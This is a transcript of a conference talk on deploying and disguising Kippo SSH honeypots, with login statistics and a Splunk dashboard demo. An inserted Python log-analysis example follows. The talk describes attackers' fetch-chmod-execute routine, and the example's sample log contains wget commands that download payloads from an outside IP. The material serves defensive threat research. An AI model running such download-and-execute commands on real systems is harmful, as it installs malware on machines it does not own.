
Thank you. Can you guys hear me? Is that good? Yeah, okay. Thank you for that introduction. As you said, my name is Ethan Dodge. I'm also known as chippen on IRC; just like everybody else here has an alias, so do I. Actually, I was never called chippen to my face until yesterday, and it was kind of a weird experience for me, so you can go ahead and call me Ethan; I'd probably respond better to that anyway. The title of my talk was "Security Onions and Honeypots," but now it's just honeypots, because I really like them a lot, so I'm going to talk about them a lot. I'm sorry if you guys came here wanting to get some Security Onion demos and the lowdown on that. I'd be more than happy to still go over it with any of you; hit me up on Twitter, on IRC, or by email any time, and I'd be more than happy to go over what I was going to go over. I love network security monitoring; it's what I do for a living.

So first off, I've got to read this disclaimer real quick: the views expressed here are solely mine and not the views of my employer or any other organization with which I'm associated, and I am responsible for the content of this presentation. Likewise, the research conducted and illustrated herein was performed by me unless otherwise noted.

All right, so I want to talk a little bit about the audience I want to address here. Pretty much, I think those three categories cover everybody, and that's what I really like about honeypots: you don't have to have a ton of experience to get into them, and you can learn a heck of a lot from them. So I'm talking to the noobs for whom this is their first security con. BSides last year was my very first security con, and I remember being amazed; well, I still am, but I just remember my mind being blown by every talk I listened to at BSides last year. I was like, "They can do that? No way." It's also kind of depressing, because it's like, "Oh, I fight you guys for a living, and yet you're way ahead of me in the game." Anyway, I'm also talking to those looking to get into the honeypot and threat intelligence communities, and those that may already have experience with honeypotting. I love talking to other people that have experience with honeypots and do their own research on them, because we always bounce ideas off of each other; I learn something new almost every time I talk to somebody. I'm actually doing some research with a group; let's see, I think there are 18 or 19 of us, and collectively we have a ton of honeypots and we're doing research. I think we have about 40 hosts now, and I'll talk a little bit about that later on in the presentation.

So let's get to it: honeypots. Beware of addiction. If you guys are going to get into this, it is addicting; you can ask my wife. I'm up until like 4:00 in the morning almost every night because I love modifying my honeypots, I love looking at the malware that's coming in, stuff like that. So I thought that meme was fitting; sometimes I feel like Pooh: get away, give me my honey.

So, why honeypots? How many of you guys... okay, let's be honest. Please don't be afraid to ask any questions, and don't be afraid to admit that you don't know something. How many of you guys don't know what a honeypot is? Is there anybody here? You in the back? Okay. Rob, I know that you know what a honeypot is; I talk to you about my honeypots like twice a week. So, how many of you guys are skeptical of honeypots and what they can do, whether they're really of value? Anybody in the room? Yeah, I know there are quite a few people that don't really think that honeypots are worth it, and I definitely see the point. You know, you stand up a vulnerable host and some script kiddie gets into it. Woohoo. Of course that's going to happen; there's scanning of the internet 24/7. Or people like to throw out this reason, threat intelligence, right? Kind of one of the buzzwords. And yeah, I mean, it's true: who am I to stand up a ton of vulnerable hosts and then say, "Oh, I'm getting attacked from this IP with this malware and you should watch out for it"? That's not real threat intelligence, right? That's just some kid having fun and thinking he's awesome. I really like this meme as well: "Threat intelligence: it's just a stupid RSS feed." I found it on Twitter; I had to do some editing, there was another word in there, I'm sure some of you guys saw it.
Anyway, threat intelligence has become one of those buzzwords that you hear, and I've already said it like 20 times, so I'm sure some of you guys have already taken some drinks. It's almost like cloud and big data. Heartbleed: you know, there's some more drinks, go for it. Anyway, honeypotting can lead to high-integrity threat intelligence if you put time into it and you do it right. The problem with some of these companies... any of you guys familiar with Norse or CrowdStrike or Mandiant, that sell threat intelligence? Awesome products, awesome companies; I'd love to work for one of them one day, just throwing that out there. But part of the problem is, even with such an awesome product, where they have hundreds of hosts all over the internet gathering this threat intelligence, unless you're willing to pay a ton of money it's never really targeted threat intelligence, right? You may have a completely different environment than the environment they're monitoring. Maybe they're selling you intel for Windows malware and you've got an entire Linux environment, or vice versa, or whatever it may be; it's often very hard to get some tailored intelligence. This article showed up in Dark Reading, like two years ago, but it's a good article: "Five Reasons Why Every Company Should Have a Honeypot." It goes through and talks about how, like I was just saying, you can get tailored intelligence. You stand up a host that is vulnerable, and if you do it right and you don't make it obvious that it's a honeypot, and they actually try to exploit your network (you could have an entire honeynet with multiple boxes that they could pivot to and exploit), you're going to be able to see what kind of attackers are specifically targeting your company, or whatever it may be. And if they are targeting you, you'll be able to see what they do when they get in, what they're trying to accomplish. Now, don't get me wrong, there are tons of cyber criminals out there that don't necessarily have a target; I guess they're not cyber criminals, they're more script kiddies, and they're just scanning the entire internet trying to find vulnerable boxes, pop as many boxes as they can, brag about it on Twitter, and call it activism. Thanks for the sympathy laugh, whoever that was. Anyway, so yeah, I would highly recommend a honeypot.

So let's go through the different types of honeypots. How many of you guys have ever heard of HoneyDrive? Okay, we've got a few in the room. How many have actually deployed it? Any of you guys? You back there, what do you think? Think it's sweet? What do you like about it? Yeah, it's true, that's very, very true. Do you have multiple instances of it, or, tell me this, did you have multiple of the honeypots running at the same time on there, or did you kind of alternate just one or the other? See, and that's kind of... hold on, let me tell you what HoneyDrive is first of all. They call it a Linux distro, but really it's just Ubuntu with a ton of honeypots pre-installed on it. You deploy the ISO and it comes pre-installed with Kippo, Dionaea (I don't know how to pronounce that), Honeyd, Glastopf, Conpot, Thug, and it also comes with some visualization applications such as Kippo-Graph, Honeyd-Viz, DionaeaFR (I'm sorry, whoever the developer is, I'm totally butchering the name) and the ELK stack. Anyway, my beef with HoneyDrive is that it's super good if you're just trying to get into the scene, and that's probably who they tailored it towards, but if you have port 22 and port 80 and port 443 and port 123 and port 53 all open on one IP address, and they're all exploitable and super easy to get into, they're going to know that they're in a honeypot, right? So realistically you're never going to run every single one of those at the same time. And honestly, like I said, it's an Ubuntu distro; it's running on Xubuntu and a lot of RAM is being taken up by the desktop environment. My personal favorite on that list is Kippo, and I'm running Kippo on some boxes that only have 256 MB of RAM. I've been tinkering with the idea of trying to get it to run on some boxes that only have 128 MB of RAM. I was talking to the developer and he said that would be pushing it a little, but I want to try it nonetheless. So HoneyDrive: I would recommend it if you're trying to get into the scene, because, like he said, all the hard work is done; all the honeypots are installed, you've just got to do ./start.sh and there you go.

So there are low-interaction and high-interaction honeypots, and each has its purposes. Low interaction is typically a simulation, probably a virtual environment with incomplete functionality. For instance, if you hop on (we're going to go over a lot of this in a little bit) you won't be able to run all the commands that you normally would be able to if it was a Windows host or a Linux host or whatever. It can't really be used to exploit other vulnerabilities, because you don't have a whole lot of functionality in there, unless they know they're in a honeypot and then learn how to pop the honeypot; then your host is screwed, right? Then they could take over that whole network. Anyway, they're used to observe behavior: a script kiddie gets in, he downloads some malware, and you can go in and reverse engineer that malware. There were a couple of really good malware talks at this conference that I went to; I would highly recommend going back and looking at them. I've recently gotten into malware analysis, though I'm still such a noob at it, but those talks got me really excited about it. An example of a low-interaction honeypot would be Kippo.

Then there's also high interaction, where high interaction is an actual machine; they're going to have full capability, and somehow you're either tapping the line and getting all the traffic that's going to that box, or you have some sort of proxy that's decrypting the traffic if it's encrypted, or just picking it up, logging it, and sending it back to you somehow. I haven't seen a ton of these developed unless it's in-house; I would imagine a big enterprise duplicated their web server, tapped the line, and made that particular IP address vulnerable and whatnot. There are a lot of ways you can go about doing it. They're used to observe targeted attacks; you're going to get a lot higher-integrity threat intel from that, and they're not supposed to be easily detectable. One example is one that's actually in alpha testing right now, called Bifrost. I was really hoping to try to get it deployed before BSides so I could talk a little bit about it, but I have not been able to yet. I will probably blog about it when I do, if you guys want to check that out.

So, Kippo. Let's go over Kippo. Like I said, this is the one I'm running. I currently have five hosts running Kippo; I had six, but then one completely got hosed and I didn't have time to get it back up and running before BSides, and it was not because I got pwned, the hard drive just failed. I was running it on my home network, by the way. If you run it on your home network (I was actually running HoneyDrive, so maybe HoneyDrive did it; anyway), make sure you firewall that sucker and make sure that it cannot get out to your actual home network, because that would be very bad. I would recommend Endian Firewall or pfSense. Anyway, Kippo is a medium-interaction SSH honeypot designed to log brute-force attacks and, most importantly, the entire shell interaction performed by the attacker. That's straight from the Kippo GitHub. Like it says, it logs the entire shell session and sends it back to you in a log. There are several tools that you can use for visualization that will kick back the logs to you and show you exactly what the attacker did; you can see if he tried to download any malware, or if he tried to download an entire Windows ISO and totally hosed your entire machine if you're running on small boxes, which has happened to me before.

So, how Kippo works. Is anybody here familiar with Kippo? How many of you have used Kippo? You two, okay. Are you guys familiar with how it works? Yeah. So basically Kippo just runs in a virtual Python environment and it simulates a Debian box, I think it's Debian 5 or maybe Debian 6, and it's programmed to respond to the basic Linux commands such as ls, ping, ifconfig, uname, ps, all your basic sysadmin stuff. But the problem is all the outputs of all of those commands are static, so it's really easy to tell if it's Kippo; they're just sitting in a file that the script calls and outputs, right? We'll get into how easy it is to detect. Also, it depends on a file called the fs.pickle file, which is what simulates the Debian file system, and you can create your own fs.pickle file pretty easily; I did mine in like two minutes, and I'll go over how to do that too.

Okay, so how to detect Kippo. These are some fun, interesting examples. You'll see here in the top right that the server prompt, the command prompt, is root@svr03. That is the prompt for Kippo right out of the box if you do not change anything, and Kippo is so widespread, there are so many hosts on the internet running it, that anybody's going to log in, see root@svr03, and hop right out. That is the first thing I would change if I were you. Also, you'll see below that I was able to ping 999999999999 and it somehow resolved to 23623. And you'll also notice that I actually had the count flag on there to only send three packets; it sent six until I actually had to stop it; I think there was a Control-C somewhere in there. Then also ifconfig. It was actually Metacortex that pointed this out to me. You'll see here I did an ifconfig twice; for those of you who aren't familiar with ifconfig, it shows you your network status, your IP address, your MAC address, and here at the bottom it has the RX bytes and TX bytes. If you're logged in via SSH to a box and you did ifconfig twice, those should change, but you'll see they haven't. So that's also a super easy way. There are a ton of other easy ways too, and we'll talk a little bit about it as we go on. There are several Metasploit modules that will detect it before the user even logs in; I'm not nearly smart enough to know how exactly that works. A friend of mine, Andrew Morris, does a lot of work with Kippo and he actually wrote the most recent one, and that one has since been patched. I was going to pull up his blog article about that, but his blog is down for some reason, so when it comes back up I'll tweet it out or something.

Yeah, so there are some really simple ways to hide Kippo, to make it less detectable. Like I said, the first thing I do is change that hostname. Add a login banner: when I first deployed Kippo and was getting ready to gather all this data and research, I just deployed it right out of the box; I didn't change anything, just default settings. I didn't have a single... well, I had some successful logins, but they logged in and then hopped right back out, right? They didn't even run any commands, because it was so obvious that it was a Kippo box. I added a login banner and changed the hostname, and within an hour I had scripted malware attacks coming in, and they were trying to download all this stuff; really cool. So just those two, while it's still not going to be incredibly high-integrity malware or threat intel, they do a lot. Edit the userdb.txt: the userdb.txt file is what Kippo depends on for the credentials. Right out of the box it accepts, well, depending on what fork you pull from, but the original one accepted only root as the username and then 123456 as the password. The most commonly used fork of Kippo now accepts anything but that combination. That's also a super easy way to detect if you're in a honey box: if it accepted two different credentials for the same user, two different passwords for the same user, that's a red flag, right? Change the file system: there's a really awesome script called createfs.py, and basically it will take any mounted hard drive, any mounted file system, and create the fs.pickle file out of it. So I just spun up a new Ubuntu VM that was serving up some DNS, ran that script, and I had a new fs.pickle file, and all of a sudden my Kippo instance was simulating an Ubuntu box and not a Debian box. That can do a lot; however, and I'll get into this, it's arguable whether changing the file system really helps you, because so much of it is scripted. Edit the /etc/passwd and /etc/shadow files, and edit the script output: edit the ifconfig output, edit the ps output. That's another thing: the ps output is static, and we all know the ps output should be changing; processes are always ending and running and everything.

Okay, so this is the exciting part here. I'm going to go into my findings, what I found. Like I said, I have been running five Kippo boxes for a couple of months now; well, I spun some of them up at different times,
but I've been doing it for a little bit here. I just find really cheap hosting, a really cheap VPS, and I buy it, throw Kippo on it, make my modifications, and then observe. I have two in the United States, two in Canada, and one in Europe. These are my two boxes that are both in LA. You see the top graph; these are graphs of login attempts versus login successes; the blue is login attempts, the yellow is login successes. There's a whole lot more blue than yellow, right? So you'll see this is over the past 30 days; I pulled these last night at like 2 in the morning, or this morning at like 2 in the morning, and you'll see that the top one has had 59 total attempts and 10 successes, and the bottom one has had 3,924 total attempts and two successes. Does that seem high or low to you guys? Low? Why does it seem low? Who said that? Why is that low? Yeah. So I'm not going to lie: I don't know. I haven't had enough time to do enough research to know exactly why those two boxes are getting the data they are. I don't know, maybe there's some underground community and they've been flagged as honeypots; I doubt that's the case. Anyway, the bottom one has only two successes, and there's a reason for that. I changed the credentials on the one on the bottom graph, the one that had the least amount of successful logins. The top graph I just left at the default, root/123456, and they get in, and a lot of times that's a red flag for people; it's like, "Oh, that's definitely a honeypot if it's that easy to get into." Actually, you never know. I know there are tons of sysadmins in here that know exactly what I'm talking about. The bottom one I changed to only accept a 14-character password for the root user. A 14-character password: how hard is that to crack? It's crazy hard, unless you do something. My boss is actually really good at password cracking, and I think he claims to have cracked 16-character passwords and whatnot. Anyway, you'll see it says I leaked the password there. What I did is I leaked the 14-character password to the honeypot on Pastebin, just to see what would happen; I was just really curious. I had a buddy do the same thing. You'll see that's the format I did it in: I just listed the IP, listed the user, listed the password, threw some leet language in there, and pretended like I was an activist that just pwned this box or whatever. I posted that at 1:14 a.m. Mountain Standard Time. Any guesses as to how long it took before I saw a login? 30 seconds? Wow, who said that? Okay, what else, any other guesses? 20 seconds? Wow, you guys. I will say this: in under two minutes the Pastebin had over 100 views, and that's just because there are so many bots mining Pastebin for credentials, right? I didn't know anyone was going to guess as fast as you guys did, but at 2 hours and 35 minutes (I thought that was crazy fast) I saw a successful login. I saw it at 3:49 from a Romanian IP address that had malicious intent, with a 14-character password, logging into a box with malicious intent. You know that they saw that link on Pastebin; there's no way that they cracked it and it just so happens they cracked it 2 hours and 35 minutes after I posted that, and that was the first time I'd ever seen that IP come at any of my boxes. That slide is wrong: it had over 100 views in two minutes. I saw five different logins from three distinct IP addresses over the course of 12 hours, and then I didn't see any more until just last week, when I got two more logins to that box. The other two IP addresses, they had no malicious intent; they just hopped on the box, like, "Yeah, look at me, I'm so awesome, I'm on somebody else's box," you know? So I made this meme in their honor: whoever you guys are, that's what I think of you. Just kidding, I'm sure you're great people.

Okay, so these are my stats, login attempts versus successes in the past 30 days, on two boxes that I have in Canada. First off, what stands out on those two graphs to you guys? Boom. Yeah, and that is what we call a hosting problem. You get what you pay for: CloudAtCost, super cheap, but you get what you pay for, right? So these boxes were actually seeing super steady attacks, so rather than this being 30-day data this is more like 15-day data or so; I didn't look exactly. But anyway, the top one had 255,000 attempts with 79 successes, and the bottom one had 282,000 with zero successes, and there's a reason for the zero-success one. Are these more what... who said that? You wouldn't expect that low on my other American boxes? Yeah. Is this kind of what you would expect for total attempts and successes and whatnot? Yeah. I mean, like I said, there are people from all over the world; believe it or not, it doesn't just happen in China, it happens elsewhere. Yes? Yeah, exactly, they actually type in a username and a password. If I did scans, oh my gosh, the number would be way bigger than this, way bigger. I think last I checked one of my honeypots was averaging like 40,000 scans a day or something like that; I could get that data for you. So yeah, these are actual: when I say login attempts, they actually entered a username and password and it either succeeded or failed.

So anyway, let's take a look at why I saw more logins on one than the other. I changed the userdb.txt on one, the one on the top graph; I set it to reject only the top 100 passwords that I got from a buddy, @da_667 on Twitter, if you guys are familiar with him; he lent me that, combined with the top 10 usernames. So any combination of those 100 passwords and 10 usernames, it just rejected, but anything else it would take. So I'm running a risk there, because it's possible to log in as the same user with two different passwords, right? But I mean, I'm just doing research, trying to see what kind of data I get, what different behaviors and different actions give me. The other one only accepts a seven-character password from five different usernames; I think the usernames are like root, ftp, and like John and Bob or something like that, I don't know, I could go in and look, but it's a seven-character password. I had like a six-character password on another box and it was cracked in like four days, but this one has yet to be cracked. I actually leaked a keylogger dump of a VM that I just spun up SSHing into this honeypot, so the keylogger had the creds in there, and I leaked that on Pastebin. Rather than explicitly saying, "Hey, these are the creds to this IP address," I just did the keylogger dump, just to see what I get. I dumped that this morning at 7:53 and still haven't seen anything, but I definitely will either tweet or blog about it when I do. Also, these two boxes are where I changed the fs.pickle, the story I told you about spinning up a new Ubuntu box, running that script, and substituting that. I'm yet to see any differing results, but like I said, everything is so scripted. Everybody's scanning the internet all day, every day, and as soon as they get into a box... their scan is scripted, and then they get into a box and the execution of the commands is all scripted too; they don't even bother with the file system, mostly. I'll definitely blog about that as well.

So here's my box in Europe: login attempts versus successes in the past 30 days. I think I stood this one up a little bit less than 30 days ago, so that's why you don't see data right there at the very beginning. It has had 4,29 login attempts and zero successes; it's because I'm running an eight-character password, and it has yet to be cracked. This is in the heart of Europe. It is my most attacked box, but the buddies I'm doing research with have a ton of boxes in Asia, and it's not attacked as much as those boxes are. Yeah, I have a slide about this at the end, but this particular one is Time4VPS; right now the euro is super low, so it's a good deal, and I got that for a whole year. And because it's in Europe I put the login banner in Spanish, because I speak Spanish and I just wanted to see if there was any correlation. I don't know how I'd measure that, but I'm just having fun, you know.

So this is what a typical malicious session looks like. Usually they hop in, they wget or curl some script or executable, they chmod it, execute it, and delete it; 99% of the time this is all scripted. You can see these attacks: wget -c, and then it downloads that script, that 1818 script, chmods it, and then runs it. This particular guy didn't try to delete it, but usually they will, and then they hop off. That's all they do. A lot of the time it's some malicious binary, or a ton of the time it's just an IRC bot that they're trying to execute and recruit for their botnet, which is fun, actually. I learned this tactic from a coworker who's actually in the room: analyze the IRC bot, see what server they're logging into via IRC, join that chat room, and see what's going on in the chat room. That's a lot of fun; sometimes you can find the guy that's running it. I had a friend who actually logged into the IRC server, found the guy that was running the botnet, and convinced him to shut it down. It was a really interesting experience; apparently he's super persuasive over IRC. He's a good friend, I like him a lot. Occasionally you'll get a whole lot more commands; in this particular session there were over 100 commands, and that's just a list of 20 right there, still malicious. This is a typical detection: if they don't detect it before they log in, they'll usually cat something like /proc/cpuinfo, which is also static, or they'll do a ps aux, or they'll do uname -r, which is actually probably the most common one I see. They see that it's default Kippo content and then they hop out.

So, Kippo visualization, the old and the new. You guys that have deployed Kippo before, what are you using for visualization? Are you using Kippo-Graph? Yeah. Anybody not using Kippo-Graph? No. Anybody ever used MHN? No, I don't have any experience with that. Anyway, this is Kippo-Graph. It just runs an HTTP server on the same box as your Kippo honeypot and graphs the stats for you; it's just some HTML thrown together. And this is cool; this is my favorite thing about Kippo-Graph: it will actually play back the entire session for you in real time and type it out, and if they paused for a minute in the middle of typing, it will wait for as long as they paused and then pick it back up, right? It's funny to see the scripted ones that are just running like 100 commands, coming up with all these errors because Kippo doesn't know that command, but it's still going. It's like, "Yeah, this is a script." That's just an example of the graph that Kippo will give you.

How many of you guys have seen this app, Tango Honeypot Intelligence? It's really new. Has anybody seen it? No. So, I'm sorry his name got wrapped around onto the other line, but Brian Warehime, a coworker of mine and a really good friend, developed this, and he just released it, I think, last week. And then this official page for it: it's a Splunk app; he submitted it to Splunk and Splunk accepted it, and that page just went up, I think, like three or four days ago. Tango Honeypot Intelligence is awesome. How many of you guys have ever used Splunk? Yeah, so you all know how powerful it is, right? So imagine if you have all your honeypots feeding into Splunk and you could parse through that data with Splunk and look at anything you want, graph anything you want. It's super awesome. It's demo time. "You expect the demo to work perfectly? You're going to have a bad time." Let's see if I can connect to the internet; if I can't, I recorded it just in case. Doesn't look like I can; I'm not even getting anything. Anyway, that is exactly why I recorded it. Give me a second
here. Okay, you've got to be freaking kidding me. Oh, I know why: wrong app, wrong app. Here we go. Woo, I knew the demo gods were not going to like me today. So hold on, before it starts playing: basically, like I said, with Tango Honeypot Intelligence you install the Splunk forwarder on your honeypot, it forwards all the logs to your Splunk instance, and Splunk indexes them. And Brian has created a ton of apps, I'm sorry, a ton of dashboards, to illustrate the type of stuff you're seeing. You'll see you've got a daily overview,
you've got successful logins, failed logins, login attempts, successes, latest successful logins, attackers logging into multiple sensors. There were no instances of that; that's why it's showing no results. He's got the session play log. He doesn't have the capability that Kippo-Graph does of actually being able to play it back for you in real time, but as long as I can see the commands I personally don't really care. So you'll see it gives a session ID to each session, so you could search in Splunk for that session ID and bring up everything that had to do with that session. It has the attacker IP, the sensor that it
hit, the message count; message count is how many commands were run in that session. And then in this dashboard you could also go in and select hpo2, that's one of my honeypots, and it pulls up all the sessions that it saw in, you see that, the last 12 hours. It's pulling up all the sessions that it saw for that honeypot in that particular time frame. It shows you when the session started, shows you the end time, shows you the duration, shows you the passwords accepted, if any more passwords were attempted. See, no other passwords were attempted by this one except for 123456. Obviously a
honeypot, right? Maybe. And this guy, he echoed, ls'd, and then he just logged out. Did he download anything? No, he just catted the known_hosts, which I believe is also static. So let's go look at the attacker profile now. Any questions about the app so far? No? Okay. This is its first demo, so you guys are... I was a big part of the testing of it before he actually submitted it. So let's see, I'm going back to grab an IP because I need to provide that dashboard with an IP of an attacker here, so I'm just going to copy and
paste it here and then we'll see the
results. You know, I think your honeypot pushes it, but I'm not 100% sure; it very well could be polling. I could ask Brian, let me call him up, just kidding. But if you hit me up on IRC or Twitter on Monday I can answer that question for you. So I don't know if you guys saw, but it pulled up all the sessions that that particular attacker had done in that time frame, it shows you where the attack was coming from, and a bunch of other stuff. So here I think I'm grabbing a session ID for the next dashboard, or an IP. Oh, I'm grabbing a
Chinese IP, because we all know that the Chinese are all malicious when it comes to this stuff, right? Everything is China. If you're
... oh yeah, I'm bringing up one that I thought may have... just showing you that it'll bring up different IP addresses. I was hoping that that guy had multiple attacks, then it would show you whatnot. Oh, and right there at the bottom it'll show the files downloaded, and it'll give you the SHA-256 hash of that file. And coming up here, he actually has a dashboard that will go out and call the VirusTotal API and submit that hash to VirusTotal, and then it will tell you if it's been seen by anybody else or not. Pretty cool. So this is session analysis: human versus bot
identification. I'm not too sure exactly what he does to determine that, but I could definitely ask him if anyone's curious. Those are rare commands entered during the session that we don't see very often. Obviously that executable, that 1818, I think that was the only time; I think it was only downloaded on one honeypot.
So this is just going to show you the top countries with logins, top countries scanning. Look at the top countries scanning, why not, right? Everything is China. So anyway, I'm going to pause this video and go to the next one, if you guys don't mind. This one's a little shorter. This is going through the file analysis that I was just telling you about that will call out to VirusTotal. So I'm pulling up all the latest file downloads from the past seven days. Just waiting for the data to populate here,
and those are all the files that were downloaded in the last seven days. Keep in mind this is only monitoring five honeypots; in our environment where we have 40 feeding into our SIEM environment you'd see a whole lot more. And it's got the SHA-256 hash, the attacker IP, the sensor that it was downloaded onto, the session ID. And then you'll see this dropdown window; it autofills with all the top SHA-256 hashes. This particular hash, it's going out to VirusTotal and you'll see all those vendor signatures. It's been submitted to VirusTotal before, so it's not unique, it's been seen before. However, this one that I'm pulling up
right now has not. You'll see the vendor signatures: unknown. That was not submitted to VirusTotal before, which is pretty cool, but it's probably just a variant of some other piece of malware or something. Top 10 malware signatures seen over time: he's pulling that from VirusTotal, I believe. Legitimate malware seen: I'm not super familiar with what he's trying to do there. Potential malware files: the ones that didn't come back with any results from VirusTotal. Then we've got malware campaigns; this doesn't come up with anything. He looks at the URLs, if they're coming from the same URLs, if it's the same type of campaign, same type of
malware, basically the same script just with a different name or whatever, where they're coming from; he's trying to aggregate data. And this is obviously a lot more useful if you have more than five honeypots feeding into it, right? So let's see, then time... yeah, like I said, I'm participating with a bunch of buddies, we're doing a lot of research right now, and there's probably, I think 15 of us are actually feeding honeypots into the one Splunk app, and I think we have about 40 honeypots, and the data in there is freaking awesome. We call ourselves Threat Incorporated, if you want to follow us on Twitter, and we're
going to start publishing reports and stuff like that. And then this one just goes over the network analysis, nothing super exciting. It just shows you the top domains seen that the malware came from, the same URI on multiple domains, the last IP addresses seen, whatnot. Any questions, any other questions about the app? So it's open source and it's free. I'd highly encourage you to go download it. If you don't have any experience with Splunk there may be a little bit of a learning curve, but I would definitely recommend that you learn Splunk as well because it's becoming very, very popular in the industry.
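As an added illustration (not code from the talk, from Tango, or from Kippo), here is a small Python script that does offline what the dashboards described above do over Splunk-indexed logs: a per-session summary (attacker IP, sensor, duration, command count, accepted passwords), the SHA-256 of each downloaded file grouped by the sensors that saw it (the "same payload, different URL" campaign view), a rare-command list, and a simple human-versus-bot split. The log format is a constructed, simplified JSON-lines shape with made-up field names, not Kippo's real schema; the bot heuristic (median gap between commands) is my own assumption, not how Tango decides; the VirusTotal lookup is left out because it needs network access and an API key.

```python
import json
import hashlib
from collections import Counter, defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from statistics import median

# Constructed sample log in a simplified JSON-lines shape chosen for this example.
# NOT Kippo's or Cowrie's real schema. IPs are documentation ranges, bytes are made up.
SAMPLE_LOG = """\
{"ts":"2015-04-10T09:00:00","sensor":"hpot2","session":"a1","src_ip":"203.0.113.5","event":"login.success","password":"123456"}
{"ts":"2015-04-10T09:00:01","sensor":"hpot2","session":"a1","src_ip":"203.0.113.5","event":"command","input":"uname -r"}
{"ts":"2015-04-10T09:00:01","sensor":"hpot2","session":"a1","src_ip":"203.0.113.5","event":"command","input":"cat /proc/cpuinfo"}
{"ts":"2015-04-10T09:00:02","sensor":"hpot2","session":"a1","src_ip":"203.0.113.5","event":"command","input":"wget http://198.51.100.7/1818"}
{"ts":"2015-04-10T09:00:03","sensor":"hpot2","session":"a1","src_ip":"203.0.113.5","event":"download","url":"http://198.51.100.7/1818","content_hex":"7f454c46deadbeef"}
{"ts":"2015-04-10T09:00:03","sensor":"hpot2","session":"a1","src_ip":"203.0.113.5","event":"session.closed"}
{"ts":"2015-04-10T09:05:00","sensor":"hpot2","session":"b2","src_ip":"192.0.2.44","event":"login.success","password":"123456"}
{"ts":"2015-04-10T09:05:07","sensor":"hpot2","session":"b2","src_ip":"192.0.2.44","event":"command","input":"uname -r"}
{"ts":"2015-04-10T09:05:19","sensor":"hpot2","session":"b2","src_ip":"192.0.2.44","event":"command","input":"ls"}
{"ts":"2015-04-10T09:05:31","sensor":"hpot2","session":"b2","src_ip":"192.0.2.44","event":"command","input":"cat ~/.ssh/known_hosts"}
{"ts":"2015-04-10T09:05:40","sensor":"hpot2","session":"b2","src_ip":"192.0.2.44","event":"session.closed"}
{"ts":"2015-04-10T10:00:00","sensor":"hpot1","session":"c3","src_ip":"203.0.113.9","event":"login.success","password":"password"}
{"ts":"2015-04-10T10:00:00","sensor":"hpot1","session":"c3","src_ip":"203.0.113.9","event":"command","input":"wget http://198.51.100.7/x86"}
{"ts":"2015-04-10T10:00:01","sensor":"hpot1","session":"c3","src_ip":"203.0.113.9","event":"download","url":"http://198.51.100.7/x86","content_hex":"7f454c46deadbeef"}
"""


@dataclass
class Session:
    session_id: str
    sensor: str
    src_ip: str
    start: datetime
    end: datetime
    passwords_accepted: list = field(default_factory=list)
    commands: list = field(default_factory=list)   # (timestamp, input) pairs
    downloads: list = field(default_factory=list)  # (url, sha256 hex) pairs

    @property
    def duration_s(self) -> float:
        return (self.end - self.start).total_seconds()


def parse_log(text: str) -> list:
    """One JSON object per line; blank and malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def build_sessions(events: list) -> dict:
    """Group events by session ID; hash downloaded bytes so identical payloads match."""
    sessions = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        s = sessions.get(ev["session"])
        if s is None:
            s = Session(ev["session"], ev["sensor"], ev["src_ip"], ev["ts"], ev["ts"])
            sessions[s.session_id] = s
        s.end = max(s.end, ev["ts"])
        if ev["event"] == "login.success":
            s.passwords_accepted.append(ev["password"])
        elif ev["event"] == "command":
            s.commands.append((ev["ts"], ev["input"]))
        elif ev["event"] == "download":
            digest = hashlib.sha256(bytes.fromhex(ev["content_hex"])).hexdigest()
            s.downloads.append((ev["url"], digest))
    return sessions


def classify(session: Session, bot_gap_s: float = 2.0) -> str:
    """Timing heuristic (my assumption, not Tango's method): scripts issue commands
    faster than a person can type, so a small median inter-command gap means bot."""
    if len(session.commands) < 2:
        return "unknown"
    times = [t for t, _ in session.commands]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return "bot" if median(gaps) < bot_gap_s else "human"


def rare_commands(sessions: dict) -> set:
    """Commands entered in exactly one session across the whole data set."""
    per_session = Counter()
    for s in sessions.values():
        for cmd in {c for _, c in s.commands}:
            per_session[cmd] += 1
    return {cmd for cmd, n in per_session.items() if n == 1}


def hashes_by_sensor(sessions: dict) -> dict:
    """SHA-256 -> sensors that saw it; one hash on several sensors is the same
    payload spread from different URLs/IPs."""
    seen = defaultdict(set)
    for s in sessions.values():
        for _, digest in s.downloads:
            seen[digest].add(s.sensor)
    return dict(seen)


def analyze(text: str) -> dict:
    sessions = build_sessions(parse_log(text))
    return {
        "sessions": sessions,
        "labels": {sid: classify(s) for sid, s in sessions.items()},
        "rare_commands": rare_commands(sessions),
        "hash_sensors": hashes_by_sensor(sessions),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for sid, s in report["sessions"].items():
        print(f"{sid} {s.sensor} {s.src_ip} {s.duration_s:.0f}s {len(s.commands)} cmds "
              f"{report['labels'][sid]} pw={s.passwords_accepted}")
    print("rare commands:", sorted(report["rare_commands"]))
    for digest, sensors in report["hash_sensors"].items():
        print(digest, "seen on", sorted(sensors))
```

Feeding it real Kippo JSON would only require changing the field names in `build_sessions`; everything downstream works on the `Session` objects. The hash grouping is the piece worth keeping even without VirusTotal: two sessions on two sensors pulled the same bytes under different file names, which is exactly the "same script, different name" aggregation the campaign dashboard is after.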
So there are some downloads for you: there's the original Kippo, and the Kippo fork that I use. The Kippo fork that I use is maintained by Michel Oosterhof, and as far as I know he's actually the only Kippo developer that's actively maintaining his fork. He supports SFTP and JSON logging, and so if you're going to use Tango, I believe you have to use his fork because Tango uses JSON logging. He updates it regularly; I think the last commit that he had was like three days ago. Download Tango right there, download HoneyDrive, and then here are my hosting links. I host at
Crissic, at CloudAtCost, Time4VPS. I find these deals at LowEndStock or LowEndTalk.com, and I pay almost nothing for them. Some people that you probably want to follow if you want to get into the scene: Andrew Morris, I mentioned him; Brian Warehime; Michel Oosterhof; da_667. I think I mentioned all these guys. And Threat Incorporated, like I said, is the group of us that are collaborating together. That's my contact info: you can find me on Freenode under chippen, on Twitter under chippen, and my blog is bootspen.org. Any questions? Yes, in the back. Yeah, you
go ahead. I haven't heard anything yet. I don't imagine so, because like I said they're scanning the internet anyway, their IPs are going to get scanned anyway, and if any data gets lost, I hope they're doing a good enough job that it's only going to be my data, you know, but I don't have any sensitive data on there.
